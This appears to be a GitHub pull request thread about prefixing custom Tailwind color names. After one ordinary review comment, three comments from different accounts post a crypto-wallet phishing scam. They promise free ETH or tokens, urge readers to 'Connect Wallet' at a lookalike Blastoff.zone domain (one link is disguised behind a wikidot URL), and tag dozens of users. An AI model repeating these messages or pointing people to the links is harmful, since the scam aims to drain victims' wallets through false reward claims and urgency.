### PR TITLE
Gracebranch3

### PR DESCRIPTION
**Pull request by Ssuubi-Grace**

### CODE REVIEW

**Comment by Ssuubi-Grace** [comment]
I added A to all your colors because some of the color names you are using is same with tailwind's predefined color names. Incase you want to add any additional color, add an A prefix to your custom name to prevent it from clashing with Tailwind's format.
Please run npm install to add necessary packages before continuing.

**Comment by jguzej** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
felixweinberger, @bbirkinbine, @haxpor, @gecko20, @joshaustintech, @euntak, @xiaonan8826, @dengzhaojun, @mempirate, @matrixik, @redace85, @seoperin, @Bensenkerni08, @abc0xmattyic333, @seanmizen, @manthis, @0xpranay, @blackstorm, @chengbrian9, @KBPsystem777, @Johnsoncpk, @simpl, @StartUpDream, @jingooo5, @yulai-123, @Depauli1, @Codeblue99, @gnu-mead, @genkey6, @colinh80, @raffclar, @NicoTheDreamer, @Leonard-Lei, @cjchen5210, @Stichoza, @maufcost, @edsburke, @tuananhht94, @Dispa1r, @tfire, @WuChenDi, @ecemetin, @Swordder, @BurkhalterY, @rogerhuanglife, @spiderings, @vsbbio, @crashquentin, @luaroncrew, @phohtoo

**Comment by hupptechnologies** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
itachi2003, @0xMouiz, @GrisaiaEvy, @0xGWHY, @Shahrokhsalar, @bsnmorgan, @SealTV, @Kylin93CN, @geenutts, @DomantasP, @DavidRomy, @anayib, @feliperaitano123, @williangrios, @Mohitkrmanas9523, @pizofreude, @Aheyachy, @zavgorodny, @KingDavid9991, @truongnhatanh7, @coderraccoon, @im-sheheryar, @markoff20k, @jonigroup, @ikhana, @Damin-Lee, @matyo91, @HaydarAlim, @zhanzekun, @kbulte, @Holt666, @CT77777, @Dha0, @qulinke1230, @daann1l, @ScyLabs, @Nagarajan77, @puresimpllife, @alegria20, @dethan3, @henry4666, @edddyguo, @Keeper0615, @pigeon5401, @thyoondev, @jinczing, @mertbuyukler, @adachisan, @elohffa, @alanhc

**Comment by iamcameronwatson** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
jamesguo20, @tororo00, @Muosvr, @cyzy888, @levimichael, @zeze-zeze, @PointerToNextPole, @Lakhankumawat, @SavvasTheocharous, @justicestorm, @himomohi, @sjkcdpc, @mlnlmsl, @AkiaCode, @OkazakiNagisa, @gravmatt, @xiadd, @aooiuu, @hbokmann, @jcardibo, @savoygu, @jeasion, @lucianoschillagi, @yaoang, @qkreltms, @paulayo93, @tomaszczechowski, @jhwohlgemuth, @ChuSong327, @Peim8, @blessochampion, @evazhang612, @Devashish-021, @cuixiaohui233, @Ranguna, @4engkai, @ravjotsandhu, @eclipse1228, @abdullahcel1k, @itcodes, @jgresham, @KillaC999, @SpecChain, @alexandrewolff, @elranu, @bullishgopher, @mark134340, @alokin1990, @washt, @moveyyh

**Pull request merged**
